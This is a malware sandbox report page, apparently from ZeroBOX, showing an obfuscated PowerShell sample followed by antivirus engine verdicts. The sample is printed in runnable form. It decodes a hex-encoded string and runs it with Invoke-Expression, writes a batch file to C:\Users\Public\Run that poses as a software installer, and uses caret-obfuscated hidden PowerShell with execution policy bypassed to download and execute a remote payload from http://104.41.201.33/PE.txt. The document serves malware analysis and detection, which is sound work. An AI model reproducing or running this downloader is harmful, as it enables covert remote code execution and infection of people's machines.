Static | ZeroBOX
No static analysis available.
$aa = "24:-:46:-:56:-:59:-:54:-:46:-:59:-:54:-:46:-:59:-:46:-:59:-:46:-:59:-:46:-:59:-:46:-:47:-:59:-:3d:-:22:-:43:-:3a:-:5c:-:55:-:73:-:54:-:52:-:59:-:43:-:54:-:55:-:56:-:59:-:49:-:42:-:55:-:43:-:52:-:59:-:43:-:54:-:55:-:56:-:59:-:49:-:42:-:54:-:43:-:52:-:59:-:54:-:55:-:59:-:69:-:63:-:5c:-:52:-:75:-:6e:-:22:-:2e:-:52:-:65:-:70:-:6c:-:61:-:63:-:65:-:28:-:22:-:54:-:52:-:59:-:43:-:54:-:55:-:56:-:59:-:49:-:42:-:55:-:43:-:52:-:59:-:43:-:54:-:55:-:56:-:59:-:49:-:42:-:54:-:43:-:52:-:59:-:54:-:55:-:59:-:22:-:2c:-:22:-:65:-:72:-:73:-:5c:-:50:-:75:-:62:-:6c:-:22:-:29:-:0a:-:24:-:59:-:47:-:55:-:59:-:47:-:4e:-:55:-:48:-:59:-:47:-:55:-:59:-:47:-:59:-:55:-:47:-:59:-:47:-:55:-:59:-:47:-:59:-:55:-:47:-:20:-:3d:-:20:-:22:-:43:-:72:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:6f:-:72:-:79:-:22:-:2e:-:52:-:65:-:70:-:6c:-:61:-:63:-:65:-:28:-:22:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:23:-:22:-:2c
$bb = $aa -split ':-:' |ForEach-Object {[char][byte]"0x$_"}
$cc = $bb -join ''
Invoke-Expression $cc
start-sleep -s 7
$Content = @'
@echo off
echo [+] Please Wait, Installing software ..
SET !h=E
SET $K=N
cm^d.%!h%^x%!h% /c po^w^%!h%r^sh%!h%l^l.%!h%x^%!h% -%$K%^op -w^i^%$K%d h^idd^%!h%%$K% -%!h%x^%!h%^c B^yp^a^ss -%$K%o^%$K%^i ^I^%!h%X^(^%$K%%!h%^w^-O^b^j%!h%^ct^ %$K%^%!h%^t.W^%!h%^bc^li^%!h%%$K%^t).D^ow^%$K%loa^dS^tri^%$K%g(^'http://104.41.201.33/PE.txt'^)
Set-Content -Path C:\Users\Public\Run\Run.BAT -Value $Content
start-sleep -s 7
&('{1}{0}'-f'X','IE')(&('{1}{0}{2}' -f'je','New-Ob','ct') ('{1}{2}{0}' -f 'WebClient','Ne','t.')).('{2}{3}{1}{0}' -f'dString','nloa','D','ow').InVoKe('http://104.41.201.33/PE.txt')
Antivirus Signature
Bkav Clean
Lionic Clean
MicroWorld-eScan Trojan.Script.GenericKDZ.3517
FireEye Trojan.Script.GenericKDZ.3517
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
Cyren PSH/Agent.CL
Symantec Clean
ESET-NOD32 Clean
Baidu Clean
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
ClamAV Clean
Kaspersky Clean
BitDefender Trojan.Script.GenericKDZ.3517
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
Ad-Aware Trojan.Script.GenericKDZ.3517
Emsisoft Trojan.Script.GenericKDZ.3517 (B)
Comodo Clean
F-Secure Clean
DrWeb PowerShell.DownLoader.1457
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Clean
CMC Clean
Sophos Clean
Ikarus Trojan.PS.Agent
GData Trojan.Script.GenericKDZ.3517
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit Trojan.Script.Generic.DDBD
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
Cynet Clean
AhnLab-V3 Clean
ALYac Trojan.Script.GenericKDZ.3517
MAX malware (ai score=85)
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet Clean
AVG Script:SNH-gen [Trj]
Panda Clean
No IRMA results available.